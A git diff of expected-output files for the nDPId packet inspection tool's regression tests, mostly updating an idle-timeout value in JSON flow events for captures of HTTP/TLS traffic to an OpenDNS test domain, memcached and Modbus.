{"4":"DPI"},"proto":"TLS.OpenDNS","breed":"Acceptable","category":"Network"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"malware.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569579408876,"flow_last_seen":1569579408876,"flow_idle_time":7560000,"flow_min_l4_payload_len":329,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":329,"midstream":1,"thread_ts_msec":1569579408876,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":48394,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00891{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"malware.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1569579408876,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":383,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":383,"pkt_l4_len":349,"thread_ts_msec":1569579408876,"pkt":"CGoKOl4eMFLLbJwbCABFAAFxQQlAAEAGkCXAqAcHQ9dc0r0KAFDJvdSn63fGVVAYAfZpvAAAR0VUIC8gSFRUUC8xLjENCkhvc3Q6IHd3dy5pbnRlcm5ldGJhZGd1eXMuY29tDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBydjo2OC4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzY4LjANCkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksKi8qO3E9MC44DQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC41DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCkROVDogMQ0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQ0KDQo="} 
+00837{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"malware.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569579408876,"flow_last_seen":1569579408876,"flow_idle_time":7560000,"flow_min_l4_payload_len":329,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":329,"midstream":1,"thread_ts_msec":1569579408876,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":48394,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OpenDNS","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.internetbadguys.com","url":"www.internetbadguys.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 10.0; rv:68.0) Gecko\/20100101 Firefox\/68.0"}} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"malware.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1569579409087,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1569579409087,"pkt":"MFLLbJwbCGoKOl4eCABFAABUIjBAADgGuBtD11zSwKgHBwBQvQrrd8wJyb3V8FAYAO11CAAALDXKuXRPxt9F45TTtQ17T177PqBz\/8Tm+6YgbZe0R+XFq38BUlr3UR8MAAA="} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569579416636,"flow_last_seen":1569579416636,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569579416636,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":35236,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1569579416636,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569579416636,"pkt":"CGoKOl4eMFLLbJwbCABFAAA0xe5AAEAGDH3AqAcHQ9dc0omkAbvdSlrrAAAAAIAC+vBofwAAAgQFtAEBBAIBAwMH"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1569579416828,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569579416828,"pkt":"MFLLbJwbCGoKOl4eCABFAAA0AABAADgG2mtD11zSwKgHBwG7iaQdaco+3Upa7IASchDpWQAAAgQFtAEBBAIBAwMH"} +00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1569579416828,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569579416828,"pkt":"CGoKOl4eMFLLbJwbCABFAAAoxe9AAEAGDIjAqAcHQ9dc0omkAbvdSlrsHWnKP1AQAfZocwAA"} +00912{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569579416636,"flow_last_seen":1569579416830,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569579416830,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":35236,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.OpenDNS","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.internetbadguys.com","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569579416636,"flow_last_seen":1569579417029,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1569579417029,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":35236,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.OpenDNS","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.internetbadguys.com","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"0c0aff9ccea5e7e1de5c3a0069d103f3","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02469{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1569579416636,"flow_last_seen":1569579417030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4897,"flow_avg_l4_payload_len":489,"midstream":0,"thread_ts_msec":1569579417030,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":35236,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": 
{"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.OpenDNS","breed":"Acceptable","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.internetbadguys.com","server_names":"api.opendns.com,branded-login.opendns.com,cachecheck.opendns.com,community.opendns.com,dashboard2.opendns.com,dashboard.opendns.com,dashboard-ipv4.opendns.com,msp-login.opendns.com,api-ipv4.opendns.com,api-ipv6.opendns.com,authz.api.opendns.com,domain.opendns.com,help.vpn.opendns.com,ideabank.opendns.com,login.opendns.com,netgear.opendns.com,reseller-login.opendns.com,images.opendns.com,images-using.opendns.com,store.opendns.com,signup.opendns.com,twilio.opendns.com,updates.opendns.com,shared.opendns.com,tools.opendns.com,cache.opendns.com,api.umbrella.com,branded-login.umbrella.com,cachecheck.umbrella.com,community.umbrella.com,dashboard2.umbrella.com,dashboard.umbrella.com,dashboard-ipv4.umbrella.com,msp-login.umbrella.com,api-ipv4.umbrella.com,api-ipv6.umbrella.com,authz.api.umbrella.com,domain.umbrella.com,help.vpn.umbrella.com,ideabank.umbrella.com,login.umbrella.com,netgear.umbrella.com,reseller-login.umbrella.com,images.umbrella.com,images-using.umbrella.com,store.umbrella.com,signup.umbrella.com,twilio.umbrella.com,updates.umbrella.com,shared.umbrella.com,tools.umbrella.com,cache.umbrella.com","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"0c0aff9ccea5e7e1de5c3a0069d103f3","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=OpenDNS, Inc., CN=api.opendns.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"21:B4:CF:84:13:3A:21:A4:B0:02:63:76:39:84:EA:ED:27:EE:51:7C"}} 
+00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":26,"source":"malware.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569571476362,"flow_last_seen":1569571476362,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569579417280,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"144.139.247.220","src_port":33706,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":26,"source":"malware.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569571476362,"flow_last_seen":1569571476362,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569579417280,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"144.139.247.220","src_port":33706,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00816{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":26,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1569579416636,"flow_last_seen":1569579417280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6018,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1569579417280,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":35236,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": 
{"4":"DPI"},"proto":"TLS.OpenDNS","breed":"Acceptable","category":"Network"}} 00647{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":26,"source":"malware.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569571470672,"flow_last_seen":1569571470672,"flow_idle_time":120000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1569579417280,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"144.139.247.220","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":26,"source":"malware.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569579408876,"flow_last_seen":1569579409087,"flow_idle_time":7440000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":373,"flow_avg_l4_payload_len":186,"midstream":1,"thread_ts_msec":1569579417280,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":48394,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":26,"source":"malware.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569579408876,"flow_last_seen":1569579409087,"flow_idle_time":7560000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":373,"flow_avg_l4_payload_len":186,"midstream":1,"thread_ts_msec":1569579417280,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":48394,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":26,"source":"malware.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569571466977,"flow_last_seen":1569571467001,"flow_idle_time":180000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1569579417280,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"1.1.1.1","src_port":42370,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00553{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":26,"source":"malware.pcap","alias":"nDPId-test","packets-captured":26,"packets-processed":26,"total-skipped-flows":0,"total-l4-data-len":6587,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":4,"total-detection-updates":3,"total-updates":0,"current-active-flows":0,"total-active-flows":5,"total-idle-flows":5,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":31,"global_ts_msec":1569579417280} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ diff --git a/test/results/memcached.cap.out b/test/results/memcached.cap.out index 9b6d3302b..05cc9bfdf 100644 --- a/test/results/memcached.cap.out +++ b/test/results/memcached.cap.out 
@@ -1,11 +1,11 @@ 00459{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"memcached.cap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00545{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"memcached.cap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1534343745954} -00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"memcached.cap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534343745954,"flow_last_seen":1534343745954,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534343745954,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":59604,"dst_port":11211,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"memcached.cap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1534343745954,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1534343745954,"pkt":"AAAAAAAAAAAAAAAACABFAAA8pT5AAEAGl3t\/AAABfwAAAejUK8sskd7QAAAAAKACqqr+MAAAAgT\/1wQCCAopIHvuAAAAAAEDAwc="} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"memcached.cap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1534343745954,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1534343745954,"pkt":"AAAAAAAAAAAAAAAACABFAAA8AABAAEAGPLp\/AAABfwAAASvL6NTLJnx6LJHe0aASqqr+MAAAAgT\/1wQCCAopIHvuKSB77gEDAwc="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"memcached.cap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1534343745954,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1534343745954,"pkt":"AAAAAAAAAAAAAAAACABFAAA0pT9AAEAGl4J\/AAABfwAAAejUK8sskd7RyyZ8e4AQAVb+KAAAAQEICikge+4pIHvu"} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"memcached.cap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1534343745954,"flow_last_seen":1534343745954,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1028,"flow_tot_l4_payload_len":1035,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1534343745954,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":59604,"dst_port":11211,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"Memcached","breed":"Acceptable","category":"Network"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":10,"source":"memcached.cap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1534343745954,"flow_last_seen":1534343745954,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1028,"flow_tot_l4_payload_len":1035,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1534343745954,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":59604,"dst_port":11211,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Memcached","breed":"Acceptable","category":"Network"}} +00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"memcached.cap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534343745954,"flow_last_seen":1534343745954,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534343745954,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":59604,"dst_port":11211,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"memcached.cap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1534343745954,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1534343745954,"pkt":"AAAAAAAAAAAAAAAACABFAAA8pT5AAEAGl3t\/AAABfwAAAejUK8sskd7QAAAAAKACqqr+MAAAAgT\/1wQCCAopIHvuAAAAAAEDAwc="} 
+00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"memcached.cap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1534343745954,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1534343745954,"pkt":"AAAAAAAAAAAAAAAACABFAAA8AABAAEAGPLp\/AAABfwAAASvL6NTLJnx6LJHe0aASqqr+MAAAAgT\/1wQCCAopIHvuKSB77gEDAwc="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"memcached.cap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1534343745954,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1534343745954,"pkt":"AAAAAAAAAAAAAAAACABFAAA0pT9AAEAGl4J\/AAABfwAAAejUK8sskd7RyyZ8e4AQAVb+KAAAAQEICikge+4pIHvu"} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"memcached.cap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1534343745954,"flow_last_seen":1534343745954,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1028,"flow_tot_l4_payload_len":1035,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1534343745954,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":59604,"dst_port":11211,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Memcached","breed":"Acceptable","category":"Network"}} 
+00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":10,"source":"memcached.cap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1534343745954,"flow_last_seen":1534343745954,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1028,"flow_tot_l4_payload_len":1035,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1534343745954,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":59604,"dst_port":11211,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Memcached","breed":"Acceptable","category":"Network"}} 00553{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":10,"source":"memcached.cap","alias":"nDPId-test","packets-captured":10,"packets-processed":10,"total-skipped-flows":0,"total-l4-data-len":1035,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1534343745954} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 10/10 diff --git a/test/results/modbus.pcap.out b/test/results/modbus.pcap.out index 5fcd5b5c3..4c01fa645 100644 --- a/test/results/modbus.pcap.out +++ b/test/results/modbus.pcap.out 
@@ -1,11 +1,11 @@ 00457{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"modbus.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00543{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"modbus.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1223541953927} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"modbus.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1223541953927,"flow_last_seen":1223541953927,"flow_idle_time":7440000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":1,"thread_ts_msec":1223541953927,"l3_proto":"ip4","src_ip":"192.168.110.131","dst_ip":"192.168.110.138","src_port":2074,"dst_port":502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"modbus.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1223541953927,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1223541953927,"pkt":"ABzAX0kKAArkxYMKCABFAAA0i\/1AAIAGEGjAqG6DwKhuiggaAfZB0urG4RU6zlAY\/MYAMgAAANEAAAAGAQMAAQAB"} -00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"modbus.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1223541953927,"flow_last_seen":1223541953927,"flow_idle_time":7440000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":1,"thread_ts_msec":1223541953927,"l3_proto":"ip4","src_ip":"192.168.110.131","dst_ip":"192.168.110.138","src_port":2074,"dst_port":502,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Modbus","breed":"Acceptable","category":"IoT-Scada"}} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"modbus.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1223541953929,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":65,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":65,"pkt_l4_len":31,"thread_ts_msec":1223541953929,"pkt":"AArkxYMKABzAX0kKCABFAAAzO9pAAIAGYIzAqG6KwKhugwH2CBrhFTrOQdLq0lAY++v\/BAAAANEAAAAFAQMCAAA="} 
